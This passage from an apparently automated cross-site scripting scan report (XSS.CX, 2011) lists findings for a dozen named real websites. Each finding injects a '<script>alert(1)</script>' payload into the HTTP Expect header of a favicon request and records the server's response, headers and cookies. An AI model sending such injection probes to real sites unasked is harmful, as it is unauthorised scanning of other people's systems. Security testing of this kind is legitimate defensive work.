User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ppg.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Set-Cookie: PRD.PPG_HRDIRECT2_COOKIE=R3081022372; path=/
Date: Wed, 04 May 2011 02:30:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Exires: Tue, 19 Apr 2011 02:30:02 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2

404 NOT FOUND

32.28. http://www.purolatorautofilters.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.purolatorautofilters.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.purolatorautofilters.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Wed, 04 May 2011 03:12:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6219
X-Powered-By: ASP.NET
Exires: Tue, 19 Apr 2011 03:12:54 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2

404 NOT FOUND

32.29. http://www.rotohog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rotohog.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rotohog.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: Keep-Alive
Content-Length: 596

<html><head><title>Page Not Found</title></head><body>Page Not Found Rotohog.com</body></html>
...[SNIP]...

32.30. http://www.softballsavings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softballsavings.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.softballsavings.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"1334-1138295436000"
Last-Modified: Thu, 26 Jan 2006 17:10:36 GMT
Content-Length: 1334
Date: Wed, 04 May 2011 03:03:07 GMT

BM6.......6...(................................................................................ @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...@...`...
...[SNIP]...

32.31. http://www.southeasttech.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southeasttech.edu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.southeasttech.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Wed, 04 May 2011 03:39:38 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6219
X-Powered-By: ASP.NET
Exires: Tue, 19 Apr 2011 03:39:38 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2

404 NOT FOUND

32.32. http://www.statoil.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.statoil.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.statoil.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Wed, 04 May 2011 03:20:30 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6510
X-Powered-By: ASP.NET
Exires: Tue, 19 Apr 2011 03:20:30 GMT
Cache-Control: private,max-age=0
Content-Length: 3346
Public-Extension: http://schemas.microsoft.com/repl-2
Set-Cookie: BIGipServerpool_www.statoil.com_http80=209168576.20480.0000; path=/

   <!-- _localBinding -->
<!-- _lcid="1033" _version="" -->
<html>
<head>
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />
   <meta HTTP-EQUIV="Expires" content="0" />
   <noscr
...[SNIP]...

32.33. http://www.tel3advantage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tel3advantage.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tel3advantage.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E8E1EA24A9F496788BE2D46CE7F33678; Path=/
Set-Cookie: CRID=; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
ETag: W/"894-1234889386376"
Last-Modified: Tue, 17 Feb 2009 16:49:46 GMT
Content-Length: 894
Date: Wed, 04 May 2011 02:03:10 GMT

..............h.......(....... .......................................E.^.._.....................................M..O..Q...`........................*.........j0.J..L..N............................*..
...[SNIP]...

32.34. http://www.thebar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thebar.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thebar.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:24:40 GMT
Connection: close
Content-Length: 100

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 03:24:41 GMT
Connection: close

32.35. http://www.tickettoread.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tickettoread.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tickettoread.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"5686-1283201680000"
Last-Modified: Mon, 30 Aug 2010 20:54:40 GMT
Content-Length: 5686
Date: Wed, 04 May 2011 03:51:05 GMT
Set-Cookie: BIGipServerT2R_ROOT_PROD=2154080448.60485.0000; expires=Wed, 04-May-2011 05:51:05 GMT; path=/
pics-label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (v 0 s 0 n 0 l 0))

..............h...&... .... .........(....... ...............................mln.4S..5^..6_..<^..>l..7b..7g..>m..<o..5h..8g..8d..9e..:f..9j..6i..6i..6k..6k..6j..6i..7j..7m..7j..8m..8n..9o..9o..8k..>t
...[SNIP]...

32.36. http://www.topsofts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.topsofts.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.topsofts.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 01:09:23 GMT
Connection: keep-alive
ETag: "94Nna3f2YAD"
Last-Modified: Fri, 22 Jan 2010 04:03:51 GMT
Content-Length: 1406

..............h.......(....... ...............................)$.............B5...b........S...R.....=:?.....A)..O:..X5..7"...U..f>..<<;..e..bWQ.2!......kcW...R......b+..pN..k...~%.xeM..d....a.lcU.OM
...[SNIP]...

32.37. http://www.ucc.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ucc.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ucc.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Xet-Cookie:
Age: 465
Date: Wed, 04 May 2011 02:56:08 GMT
Cache-Control: public
Connection: Keep-Alive
Via: NS-CACHE-6.0: 62
ETag: "EA40z5AGXf+"
Server: Resin/3.1.8
Last-Modified: Tue, 09 Sep 2008 00:47:34 GMT
Content-Length: 894

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

32.38. http://www.usmc-mccs.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usmc-mccs.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usmc-mccs.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:36:28 GMT
Content-Length: 2930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<cfparam name="url.sid" default="mccs">
...[SNIP]...

32.39. http://www.ziploc.com/favicon.ico  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ziploc.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ziploc.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Cache-Control: private,max-age=0
Content-Length: 13
Server: Microsoft-IIS/7.0
Exires: Tue, 19 Apr 2011 01:14:30 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
Date: Wed, 04 May 2011 01:14:30 GMT

404 NOT FOUND

Report generated by XSS.CX at Wed May 04 10:46:35 CDT 2011.